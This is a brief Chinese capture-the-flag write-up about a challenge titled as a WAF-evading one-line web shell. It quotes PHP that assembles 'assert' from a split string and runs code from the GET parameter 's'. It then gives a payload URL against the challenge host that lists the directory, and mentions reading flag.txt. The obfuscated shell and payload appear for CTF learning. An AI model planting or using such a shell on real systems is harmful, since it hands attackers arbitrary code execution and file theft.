过狗一句话
题目提示里的php代码拿下来
<?php $poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>
- 1
- 2
- 3
- 4
- 5
用assert执行任意代码
这就很自由了
payload:http://120.24.86.145:8010/?s=print_r(scandir('./'));
扫描目录
然后读取flag.txt